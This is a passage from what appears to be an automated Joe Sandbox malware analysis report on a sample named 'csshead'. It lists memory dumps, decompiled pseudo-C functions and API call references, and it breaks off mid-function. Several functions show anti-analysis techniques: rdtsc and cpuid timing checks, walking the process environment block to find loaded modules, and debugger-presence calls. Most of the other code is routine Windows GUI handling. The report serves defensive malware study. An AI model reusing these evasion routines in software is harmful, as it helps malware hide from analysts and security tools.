    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 71%
    			E00406C6C(intOrPtr __eax, void* __ebx, void* __ecx, void* __edx) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				char _v29;
    				void* _t19;
    
    				_v12 = __eax;
    				_push(__eax);
    				asm("cpuid");
    				_v8 = 0xbadbad;
    				_pop(_t19);
    				if(_v8 > 0) {
    					E00406C08(0x80000002,  &_v29);
    					E00401308(_v12,  &_v29);
    					E00406C08(0x80000003,  &_v29);
    					E0040133C(_v12,  &_v29);
    					E00406C08(0x80000004,  &_v29);
    					return E0040133C(_v12,  &_v29);
    				}
    				return _t19;
    			}

    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 65%
    			E00406B18(char __eax, void* __ebx, void* __ecx, intOrPtr __edx) {
    				intOrPtr _v8;
    				char _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				intOrPtr* _v24;
    
    				_v24 = __eax;
    				asm("rdtsc");
    				_v12 = __eax;
    				_v8 = __edx;
    				asm("cpuid");
    				asm("rdtsc");
    				_v20 = 0;
    				_v16 = __edx;
    				 *((intOrPtr*)(_v24 + 4)) = _v16;
    				 *_v24 = _v20;
    				return E00406A38(_v24,  &_v12);
    			}

    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 100%
    			E004024F8() {
    				intOrPtr _v8;
    				intOrPtr* _t10;
    
    				_t10 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x1c));
    				do {
    					_t10 =  *_t10;
    				} while ( *((intOrPtr*)( *((intOrPtr*)(_t10 + 0x20)) + 0xc)) != 0x320033);
    				_v8 =  *((intOrPtr*)(_t10 + 8));
    				return _v8;
    			}

    Memory Dump Source
    • Source File: 00000000.00000002.16598097640.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598108329.00403000.00000020.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 46%
    			E004010B4(void* __eax, signed int __edx) {
    				signed int _v8;
    				intOrPtr _v16;
    				signed int _t9;
    				signed int _t11;
    
    				asm("rdtsc");
    				asm("adc eax, esp");
    				asm("rcl eax, 1");
    				_t9 = (__eax +  *0x40b118 ^ _t11) + _v16 ^ _t11 ^ __edx;
    				 *0x40b118 = _t9;
    				_v8 = _t9;
    				return _v8;
    			}

    Memory Dump Source
    • Source File: 00000000.00000002.16598097640.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598108329.00403000.00000020.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Memory Dump Source
    • Source File: 00000000.00000002.16599178748.01960000.00000040.sdmp, Offset: 01960000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1960000_csshead.jbxd
    Memory Dump Source
    • Source File: 00000000.00000002.16599191923.01963000.00000040.sdmp, Offset: 01963000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1963000_csshead.jbxd
    APIs
    • RtlEnterCriticalSection.NTDLL(00442B64), ref: 00416B05
    • GetCurrentThreadId.KERNEL32 ref: 00416B27
    • SetWindowsHookExA.USER32(00000005,Function_00006430,00442B90,00000000), ref: 00416B36
      • Part of subcall function 00411910: GetMonitorInfoA.USER32 ref: 0041196C
    • TrackPopupMenuEx.USER32(?,?,00000000,?,?,?), ref: 00416B89
    • UnhookWindowsHookEx.USER32(00442A54), ref: 00416BA1
    • RtlLeaveCriticalSection.NTDLL(00442B64), ref: 00416BB8
    • GetMenuItemCount.USER32(00433394), ref: 00416C2A
    • GetVersionExA.KERNEL32(?,?,00000000,00000090,?,00000000,00000030), ref: 00416C6B
    • GetMenuItemInfoA.USER32(00433394,00000000,00000001,0000002C), ref: 00416CA3
    • lstrlen.KERNEL32(?), ref: 00416CDD
    • SetMenuItemInfoA.USER32(00433394,00000000,00000001,0000002C), ref: 00416CF8
    • ModifyMenuA.USER32(00433394,00000000,?,?,00000000), ref: 00416D17
    • GetMenuItemCount.USER32(00433394), ref: 00416D34
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 79%
    			E0041EBA0(struct HWND__* _a4, signed short _a8, struct HWND__* _a12, long _a16, struct HMENU__* _a20) {
    				CHAR* _v4;
    				char _v512;
    				char _v516;
    				char _v524;
    				char _v528;
    				char _v572;
    				char _v576;
    				struct HWND__* _v584;
    				signed int _v588;
    				long _v592;
    				int _v596;
    				struct HINSTANCE__* _v600;
    				int _v604;
    				struct HINSTANCE__* _v608;
    				void* _v612;
    				CHAR* _v616;
    				signed short _v620;
    				CHAR* _t78;
    				struct HRSRC__* _t79;
    				void* _t80;
    				struct HWND__* _t87;
    				long _t91;
    				struct HINSTANCE__* _t98;
    				signed int _t103;
    				signed short _t108;
    				signed int _t110;
    				struct HINSTANCE__* _t119;
    				short* _t125;
    				signed int _t128;
    				signed short _t134;
    				signed short _t138;
    				struct HINSTANCE__* _t146;
    				struct HINSTANCE__* _t147;
    				void* _t149;
    				signed int _t157;
    				struct HWND__* _t158;
    				intOrPtr _t162;
    				struct HINSTANCE__* _t163;
    				struct HWND__* _t164;
    				struct HWND__* _t166;
    
    				_t78 = _a8 & 0x0000ffff;
    				_t163 =  *0x442b94; // 0x0
    				_v588 = _t163;
    				_v604 = _t78;
    				_t79 = FindResourceA(_t163, _t78, 0xf1);
    				if(_t79 != 0) {
    					_t80 = LoadResource(_t163, _t79);
    					__eflags = _t80;
    					if(_t80 == 0) {
    						goto L1;
    					} else {
    						_t164 = LockResource(_t80);
    						__eflags = _t164;
    						if(_t164 == 0) {
    							return 0;
    						} else {
    							_t166 = _a12;
    							__eflags = _t166;
    							_t157 = 0 | _t166 != 0x00000000;
    							_v584 = ( *(_t164 + 6) & 0x0000ffff) + _t157;
    							_v516 = 0;
    							_t87 = L0041EB40( &_v516, ( *(_t164 + 6) & 0x0000ffff) + _t157);
    							_v584 = _t87;
    							__eflags = _t87;
    							if(_t87 != 0) {
    								__eflags = _t166;
    								if(_t166 != 0) {
    									_t87->i = 4;
    									 *((intOrPtr*)(_t87 + 4)) = 0;
    									 *((short*)(_t87 + 8)) = 0x100;
    									 *((intOrPtr*)(_t87 + 0xc)) = 0;
    									 *((intOrPtr*)(_t87 + 0x10)) = 0;
    								}
    								_t146 = 0;
    								_t128 = 0;
    								_v600 = 0;
    								__eflags = 0 -  *(_t164 + 6);
    								if(0 <  *(_t164 + 6)) {
    									_t125 = _t87 + 8 + (_t157 + _t157 * 4) * 4;
    									_t25 = _t146 + 8; // 0x8
    									_t162 = _t25;
    									do {
    										__eflags =  *(_t164 + 8 + _t128 * 2);
    										if( *(_t164 + 8 + _t128 * 2) == 0) {
    											 *((intOrPtr*)(_t125 - 8)) = _t162;
    											 *(_t125 - 4) = 0;
    											 *_t125 = 0x100;
    										} else {
    											 *((intOrPtr*)(_t125 - 8)) = _t146;
    											_t146 =  &(_t146->i);
    											 *(_t125 - 4) =  *(_t164 + 8 + _t128 * 2) & 0x0000ffff;
    											 *_t125 = 4;
    										}
    										 *((intOrPtr*)(_t125 + 8)) = 0;
    										 *((intOrPtr*)(_t125 + 4)) = 0;
    										_t128 = _t128 + 1;
    										_t125 = _t125 + 0x14;
    										__eflags = _t128 - ( *(_t164 + 6) & 0x0000ffff);
    									} while (_t128 < ( *(_t164 + 6) & 0x0000ffff));
    									_v600 = _t146;
    								}
    								_t147 =  *0x442b90; // 0x0
    								_t158 = CreateWindowExA(0, "ToolbarWindow32", 0, _a16, 0, 0, 0x64, 0x64, _a4, _a20, _t147, 0);
    								__eflags = _t158;
    								if(_t158 != 0) {
    									SendMessageA(_t158, 0x41e, 0x14, 0);
    									_t91 = SendMessageA(_t158, 0x31, 0, 0);
    									_v608 = _t91;
    									__eflags = _t91;
    									if(_t91 == 0) {
    										_v612 = GetStockObject(0xd);
    									}
    									_v576 = 0;
    									E00422840( &_v572, 0, 0x38);
    									_t149 =  &_v576;
    									GetObjectA(_v608, 0x3c, _t149);
    									asm("cdq");
    									_t98 =  *0x442b94; // 0x0
    									_v620 = (_v588 ^ _t149) - _t149 & 0x0000ffff;
    									_v608 = _t98;
    									_t103 =  *(LockResource(LoadResource(_v608, FindResourceA(_t98, _v616, 2))) + 0xe) & 0x0000ffff;
    									__eflags = _t103 - 4;
    									if(_t103 <= 4) {
    										_v608 = _v600;
    										_push( &_v608);
    										_push(_v612);
    										_v604 = 0;
    										_v604 = _v4;
    										_push(0x413);
    									} else {
    										_t142 = 0xff000000;
    										__eflags = _t103 - 0x20;
    										if(_t103 == 0x20) {
    											_t142 = 0xffffffffffffffff;
    											__eflags = 0xff000000;
    										}
    										_t119 =  *0x442b94; // 0x0
    										_push( *0x43304c(_t119, _v616, _t164->i & 0x0000ffff, 1, _t142, 0, 0x2040));
    										_push(0);
    										_push(0x430);
    									}
    									SendMessageA(_t158, ??, ??, ??);
    									SendMessageA(_t158, 0x414, _v596, _v592);
    									_t108 =  *(_t164 + 4) & 0x0000ffff;
    									_t134 = _v620;
    									__eflags = _t108 - _t134;
    									if(_t108 <= _t134) {
    										_t108 = _t134 & 0x0000ffff;
    									}
    									SendMessageA(_t158, 0x420, 0, (_t108 & 0x0000ffff) << 0x00000010 | _t164->i & 0x0000ffff);
    									_t110 =  *(_t164 + 4) & 0x0000ffff;
    									_t138 = _v620;
    									__eflags = _t110 - _t138;
    									if(_t110 <= _t138) {
    										_t110 = _t138 & 0x0000ffff;
    									}
    									SendMessageA(_t158, 0x41f, 0, (_t110 + 0x00000007 & 0x0000ffff) << 0x00000010 | _t164->i + 0x00000007 & 0x0000ffff);
    									__eflags = _v528 -  &_v524;
    									if(_v528 !=  &_v524) {
    										E004049C0( &_v528);
    									}
    									return _t158;
    								}
    								__eflags = _v516 -  &_v512;
    							} else {
    								__eflags = _v516 -  &_v512;
    							}
    							if(__eflags != 0) {
    								E004049C0( &_v516);
    							}
    							__eflags = 0;
    							return 0;
    						}
    					}
    				} else {
    					L1:
    					return 0;
    				}
    			}

    APIs
    • FindResourceA.KERNEL32(00000000,?,000000F1), ref: 0041EBC5
    • LoadResource.KERNEL32(00000000,00000000,?,?), ref: 0041EBDE
    • LockResource.KERNEL32(00000000,?,?), ref: 0041EBE9
    • CreateWindowExA.USER32(00000000,ToolbarWindow32,00000000,?,00000000,00000000,00000064,00000064,?,?,00000000,00000000), ref: 0041ECD8
    • SendMessageA.USER32(00000000,0000041E,00000014,00000000), ref: 0041ED13
    • SendMessageA.USER32(00000000,00000031,00000000,00000000), ref: 0041ED1A
    • GetStockObject.GDI32(0000000D), ref: 0041ED26
    • GetObjectA.GDI32(?,0000003C,?), ref: 0041ED50
    • FindResourceA.KERNEL32(00000000,?,00000002), ref: 0041ED77
    • LoadResource.KERNEL32(?,00000000,?,?), ref: 0041ED83
    • LockResource.KERNEL32(00000000,?,?), ref: 0041ED8A
    • ImageList_LoadImageA.COMCTL32(00000000,?,?,00000001,FF000000,00000000,00002040,?,?), ref: 0041EDBF
    • SendMessageA.USER32(00000000,00000413,?,?), ref: 0041EDF5
    • SendMessageA.USER32(00000000,00000414,?,?), ref: 0041EE07
    • SendMessageA.USER32(00000000,00000420,00000000,?), ref: 0041EE2D
    • SendMessageA.USER32(00000000,0000041F,00000000,?), ref: 0041EE5D
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    C-Code - Quality: 97%
    			E004081D0(WNDCLASSEXA* __ecx, void** _a4) {
    				void _v48;
    				char _v92;
    				void _v96;
    				char _v100;
    				struct _CRITICAL_SECTION* _v104;
    				struct HINSTANCE__* _v108;
    				void* _v112;
    				int _t55;
    				int _t57;
    				int _t61;
    				void* _t69;
    				WNDCLASSEXA* _t74;
    				struct HINSTANCE__* _t94;
    				struct HINSTANCE__* _t98;
    				CHAR* _t103;
    				CHAR* _t106;
    				struct HINSTANCE__* _t109;
    				struct HINSTANCE__* _t110;
    				CHAR* _t111;
    				void** _t114;
    
    				_t112 =  &_v112;
    				_t74 = __ecx;
    				if( *((short*)(__ecx + 0x40)) != 0) {
    					L15:
    					if( *(_t74 + 0x30) != 0) {
    						 *_a4 =  *(_t74 + 0x34);
    					}
    					return  *(_t74 + 0x40);
    				} else {
    					_v104 = 0x442b64;
    					EnterCriticalSection(0x442b64);
    					_v100 = 1;
    					if( *(_t74 + 0x40) != 0) {
    						L14:
    						LeaveCriticalSection(0x442b64);
    						goto L15;
    					} else {
    						_t94 =  *0x442b90; // 0x0
    						_t103 =  *(_t74 + 0x30);
    						_t109 = _t94;
    						_v108 = _t109;
    						if(_t103 == 0) {
    							asm("sbb edx, edx");
    							_t74->hCursor = LoadCursorA( !( ~( *(_t74 + 0x3c))) & _t109,  *(_t74 + 0x38));
    							goto L8;
    						} else {
    							_t111 = _t74->lpszClassName;
    							_v112 =  *(_t74 + 8);
    							_v96 = 0x30;
    							E00422840( &_v92, 0, 0x2c);
    							_t114 =  &(( &_v112)[3]);
    							if(GetClassInfoExA(_t94, _t103,  &_v96) != 0 || GetClassInfoExA(0,  *(_t74 + 0x30),  &_v96) != 0) {
    								_t69 = memcpy(_t74,  &_v96, 0xc << 2);
    								_t112 =  &(_t114[3]);
    								_t74->lpszClassName = _t111;
    								_t109 = _v108;
    								 *(_t74 + 0x34) =  *(_t74 + 8);
    								 *(_t74 + 8) = _t69;
    								L8:
    								_t74->style = _t74->style & 0xffffbfff;
    								_t74->hInstance = _t109;
    								if(_t74->lpszClassName == 0) {
    									_t106 = _t74 + 0x42;
    									L00404680(_t106, 0xd, "ATL:%p", _t74);
    									_t112 =  &(_t112[4]);
    									_t74->lpszClassName = _t106;
    								}
    								_t55 = GetClassInfoExA(_t74->hInstance, _t74->lpszClassName, memcpy( &_v48, _t74, 0xc << 2));
    								 *(_t74 + 0x40) = _t55;
    								if(_t55 == 0) {
    									if( *(_t74 + 0x50) != 0) {
    										_t98 =  *0x442b94; // 0x0
    										_t57 = GetSystemMetrics(0xc);
    										_t74->hIcon = LoadImageA(_t98,  *(_t74 + 0x50) & 0x0000ffff, 1, GetSystemMetrics(0xb), _t57, 0);
    										_t110 =  *0x442b94; // 0x0
    										_t61 = GetSystemMetrics(0x32);
    										_t74->hIconSm = LoadImageA(_t110,  *(_t74 + 0x50) & 0x0000ffff, 1, GetSystemMetrics(0x31), _t61, 0);
    									}
    									 *(_t74 + 0x40) = RegisterClassExA(_t74);
    								}
    								goto L14;
    							} else {
    								LeaveCriticalSection(0x442b64);
    								_v100 = 0;
    								L004012A0( &_v104);
    								return 0;
    							}
    						}
    					}
    				}
    			}

    APIs
    • EnterCriticalSection.KERNEL32 ref: 004081F1
    • GetClassInfoExA.USER32(00000000,?,?), ref: 0040824E
    • GetClassInfoExA.USER32(00000000,?,?), ref: 0040825F
    • LeaveCriticalSection.KERNEL32(00442B64), ref: 0040826A
      • Part of subcall function 004012A0: LeaveCriticalSection.KERNEL32(00000000,?,0040C680), ref: 004012AC
    • LoadCursorA.USER32(?,?), ref: 004082BD
    • RegisterClassExA.USER32 ref: 00408367
      • Part of subcall function 00404680: _vswprintf_s.LIBCMT ref: 00404694
    • GetClassInfoExA.USER32(?,00000000,?), ref: 00408307
    • GetSystemMetrics.USER32(0000000C), ref: 0040832C
    • GetSystemMetrics.USER32(0000000B), ref: 00408331
    • LoadImageA.USER32(00000000,00000000,00000001,00000000), ref: 00408342
    • GetSystemMetrics.USER32(00000032), ref: 00408351
    • GetSystemMetrics.USER32(00000031), ref: 00408356
    • LoadImageA.USER32(00000000,00000000,00000001,00000000), ref: 00408361
    • LeaveCriticalSection.KERNEL32(00442B64), ref: 00408376
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    C-Code - Quality: 100%
    			E0040AD70(void* __ecx, int* _a16) {
    				void* _v8;
    				void* _v12;
    				struct tagPAINTSTRUCT _v68;
    				struct tagRECT _v84;
    				struct tagRECT _v108;
    				void* _v120;
    				int _v156;
    				int _v160;
    				struct HDC__* _t38;
    				void* _t47;
    				intOrPtr* _t55;
    				void* _t69;
    				void* _t70;
    				struct HDC__* _t71;
    				void* _t77;
    				void* _t90;
    				struct HDC__* _t91;
    				void* _t92;
    				struct HDC__* _t94;
    
    				_t90 = __ecx;
    				if( *((intOrPtr*)(__ecx + 0x70)) != 0) {
    					if(( *(__ecx + 0x98) & 0x00000008) == 0) {
    						 *_a16 = 0;
    						goto L18;
    					} else {
    						_t38 = BeginPaint( *(__ecx + 4),  &(_v68.fErase));
    						_t94 = _t38;
    						if(_t94 != 0) {
    							GetClientRect( *(_t90 + 4),  &(_v84.top));
    							_t69 = CreateCompatibleBitmap(_t94, _v84.bottom - _v84.top.left, _v68.hdc - _v84.right.hdc);
    							_v108.bottom = _t69;
    							if(_t69 != 0) {
    								_t91 = CreateCompatibleDC(_t94);
    								if(_t91 != 0) {
    									_t47 = SelectObject(_t91, _t69);
    									_v8 = _t47;
    									if(_t47 != 0) {
    										_t70 = CreateSolidBrush( *(_t90 + 0xcc));
    										if(_t70 != 0) {
    											FillRect(_t91,  &_v108, _t70);
    											DeleteObject(_t70);
    											_t55 =  *((intOrPtr*)(_t90 + 0x70));
    											_t77 = _t90 + 0xb4;
    											 *((intOrPtr*)( *((intOrPtr*)( *_t55 + 0xc))))(_t55, 1, 0xffffffff, 0, 0, 0, _t91, _t77, _t77, 0, 0);
    											BitBlt(_t94, 0, 0, _v160, _v156, _t91, 0, 0, 0xcc0020);
    										}
    										SelectObject(_t91, _v12);
    										_t69 = _v120;
    									}
    									DeleteDC(_t91);
    								}
    								DeleteObject(_t69);
    							}
    							EndPaint( *(_t90 + 4),  &(_v84.right));
    							return 1;
    						} else {
    							return _t38;
    						}
    					}
    				} else {
    					_t71 = BeginPaint( *(__ecx + 4),  &(_v68.fErase));
    					if(_t71 == 0) {
    						L18:
    						return 0;
    					} else {
    						GetClientRect( *(_t90 + 4),  &(_v84.top));
    						_t92 = CreateSolidBrush( *(_t90 + 0xcc));
    						if(_t92 != 0) {
    							FillRect(_t71,  &_v84, _t92);
    							DeleteObject(_t92);
    						}
    						EndPaint( *(_t90 + 4),  &_v68);
    						return 1;
    					}
    				}
    			}

    APIs
    • BeginPaint.USER32(?,?), ref: 0040AD87
    • GetClientRect.USER32(?,?), ref: 0040ADA0
    • CreateSolidBrush.GDI32(?), ref: 0040ADAD
    • FillRect.USER32(00000000,?,00000000), ref: 0040ADC0
    • DeleteObject.GDI32(00000000), ref: 0040ADC7
    • EndPaint.USER32(?,?), ref: 0040ADD6
    • BeginPaint.USER32(?,?), ref: 0040AE01
    • GetClientRect.USER32(?,?), ref: 0040AE20
    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0040AE39
    • CreateCompatibleDC.GDI32(00000000), ref: 0040AE4E
    • SelectObject.GDI32(00000000,00000000), ref: 0040AE60
    • CreateSolidBrush.GDI32(?), ref: 0040AE75
    • FillRect.USER32(00000000,?,00000000), ref: 0040AE88
    • DeleteObject.GDI32(00000000), ref: 0040AE8F
    • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00CC0020), ref: 0040AED0
    • SelectObject.GDI32(00000000,?), ref: 0040AEDC
    • DeleteDC.GDI32(00000000), ref: 0040AEE7
    • DeleteObject.GDI32(00000000), ref: 0040AEEE
    • EndPaint.USER32(?,?), ref: 0040AEFD
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    APIs
    • __getptd.LIBCMT ref: 0042D513
      • Part of subcall function 00425EEB: __amsg_exit.LIBCMT ref: 00425EFB
    • GetConsoleMode.KERNEL32(00000000,?,?,00000001,?,U&B,0042DBB3,?,00000108,00000000,0043D088,00000010,00424FBB,U&B,00000000,00000001), ref: 0042D531
    • GetConsoleCP.KERNEL32(?,?,00422655,00000000,?), ref: 0042D551
      • Part of subcall function 0042DE77: __isleadbyte_l.LIBCMT ref: 0042DE81
    • __Stoull.NTSTC_LIBCMT ref: 0042D5EB
    • __Stoull.NTSTC_LIBCMT ref: 0042D60F
    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00422655,00000005,00000000,00000000), ref: 0042D641
    • WriteFile.KERNEL32(00000000,00422655,00000000,?,00000000), ref: 0042D66A
    • WriteFile.KERNEL32(00000000,00422655,00000001,?,00000000), ref: 0042D6C3
      • Part of subcall function 00430224: ___initconout.LIBCMT ref: 00430233
      • Part of subcall function 00430224: WriteConsoleW.KERNEL32(004426B0,00000000,00000001,?,00000000,00000000,?,0042D72B,?), ref: 00430256
    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0042D831
    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0042D90B
    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000), ref: 0042D9DB
    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0042DA0C
    • GetLastError.KERNEL32 ref: 0042DA22
    • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,00000001,?,U&B,0042DBB3,?,00000108,00000000,0043D088,00000010,00424FBB), ref: 0042DA63
    • GetLastError.KERNEL32(?,?,00422655,00000000,?), ref: 0042DA82
      • Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
      • Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
      • Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(0043A498), ref: 0042FB16
      • Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
      • Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39
      • Part of subcall function 0042D2B2: SetFilePointer.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0042D4F4,00000000,00000000,00000000,00000002,?,00000001), ref: 0042D2F4
      • Part of subcall function 0042D2B2: GetLastError.KERNEL32(?,0042D4F4,00000000,00000000,00000000,00000002,?,00000001,?,U&B,0042DBB3,?,00000108,00000000,0043D088,00000010), ref: 0042D301
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetMenuItemCount.USER32(?), ref: 00415083
    • GetVersionExA.KERNEL32(?,?,?,00000090,?,?,00000030), ref: 0041510E
    • GetMenuItemInfoA.USER32 ref: 0041516C
    • CharLowerA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,0000002C), ref: 004151C7
    • CharLowerA.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,0000002C), ref: 004151D2
    • PostMessageA.USER32(?,00000448,000000FF), ref: 00415226
    • PostMessageA.USER32(?,00000448,000000FF), ref: 0041529F
      • Part of subcall function 004140E0: SetFocus.USER32(?), ref: 00414123
      • Part of subcall function 004140E0: SendMessageA.USER32 ref: 00414141
      • Part of subcall function 00411630: GetParent.USER32(?), ref: 00411640
      • Part of subcall function 00411630: SendMessageA.USER32(00000000,0000040C,00000000,00000000), ref: 00411656
      • Part of subcall function 00411630: GetVersionExA.KERNEL32(?), ref: 0041169F
      • Part of subcall function 00411630: LoadLibraryA.KERNEL32(00436280), ref: 004116D6
      • Part of subcall function 00411630: GetProcAddress.KERNEL32(00000000,00436270), ref: 004116EF
      • Part of subcall function 00411630: FreeLibrary.KERNEL32(00000000), ref: 0041170A
      • Part of subcall function 00411630: SendMessageA.USER32(00000000,0000041D,00000000,?), ref: 0041174F
    • IsWindowEnabled.USER32(?), ref: 004152E4
    • GetClientRect.USER32(?,?), ref: 0041530D
      • Part of subcall function 004117C0: GetFocus.USER32 ref: 004117D2
      • Part of subcall function 004117C0: SetFocus.USER32(?), ref: 004117E2
    • PostMessageA.USER32(?,00000100,00000028), ref: 004153AD
      • Part of subcall function 00410FF0: SendMessageA.USER32(?,00000448,?,00000000), ref: 00410FFF
      • Part of subcall function 004128F0: SendMessageA.USER32(?,00000446,00100000,?), ref: 0041292D
      • Part of subcall function 004128F0: InvalidateRect.USER32(?,00000000,00000001), ref: 0041293B
    • MessageBeep.USER32 ref: 004153D2
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 68%
    			E00412EE0(void* __ecx, int _a4, int _a8, long _a12) {
    				struct HWND__* _v16;
    				intOrPtr _v20;
    				struct tagRECT _v44;
    				struct tagRECT _v60;
    				struct tagRECT _v80;
    				struct tagRECT _v96;
    				struct tagPOINT _v104;
    				struct tagRECT _v120;
    				struct tagRECT _v148;
    				int _t120;
    				struct HWND__* _t121;
    				signed int _t131;
    				signed int _t134;
    				int _t135;
    				intOrPtr _t148;
    				void* _t163;
    				void* _t166;
    				intOrPtr* _t184;
    				int _t189;
    				int _t198;
    				void* _t210;
    				struct tagRECT* _t224;
    				struct HDC__* _t248;
    				void* _t250;
    				int _t253;
    
    				_t250 = __ecx;
    				_t120 = CallWindowProcA( *(__ecx + 0x40),  *(__ecx + 4), _a4, _a8, _a12);
    				_a4 = _t120;
    				if( *((char*)(_t250 + 0xe8)) == 0) {
    					return _t120;
    				}
    				_t121 =  *(_t250 + 4);
    				_a8 = _t121;
    				_t248 = GetWindowDC(_t121);
    				_v96.bottom.left = 0;
    				_v80.left = 0;
    				_v80.top.left = 0;
    				_v80.right = 0;
    				GetWindowRect( *(_t250 + 4),  &(_v96.bottom));
    				_t253 = _v80.right - _v80.left;
    				_t189 = _v80.top.left - _v96.bottom.left;
    				_t224 =  &(_v96.bottom);
    				SetRect(_t224, 0, 0,  *(_t250 + 0x110), _t253);
    				if( *((intOrPtr*)(_t250 + 0x11c)) == 0) {
    					if(( *(_t250 + 0x58) & 0x00000001) == 0) {
    						_push(5);
    						_t224 =  &(_v96.bottom);
    						_push(_t224);
    					} else {
    						_push(0x10);
    						_push( &(_v96.bottom));
    					}
    					L8:
    					FillRect(_t248, ??, ??);
    					L9:
    					_v80.left = 0;
    					_v80.top.left = 0;
    					_v80.right = 0;
    					_v80.bottom = 0;
    					asm("cdq");
    					_t131 =  *(_t250 + 0x110) -  *(_t250 + 0x100) - _t224;
    					_t198 = _t131 >> 1;
    					if(_t131 < 0) {
    						_t198 = 0;
    					}
    					asm("cdq");
    					_t134 = _t253 -  *(_t250 + 0x104) - _t224;
    					_t135 = _t134 >> 1;
    					if(_t134 < 0) {
    						_t135 = 0;
